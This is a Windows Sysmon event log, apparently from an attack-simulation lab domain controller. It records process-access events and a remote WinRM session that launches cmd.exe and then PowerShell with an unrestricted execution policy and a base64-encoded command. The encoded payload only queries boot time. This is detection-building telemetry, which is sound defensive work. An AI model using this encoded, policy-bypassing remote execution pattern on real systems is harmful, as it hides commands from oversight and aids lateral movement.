12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-6444-6064-EC02-00000000AD01}50041296C:\Windows\system32\cmd.exe{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.721{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6444-6064-36DE-120000000000}0x12de360HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-6444-6064-EB02-00000000AD01}44364852C:\Windows\system32\conhost.exe{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-6444-6064-EA02-00000000AD01}3812796C:\Windows\system32\WinrsHost.exe{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.715{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6444-6064-36DE-120000000000}0x12de360HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.686{266CAFBE-62DD-6064-1400-00000000AD01}13401756C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 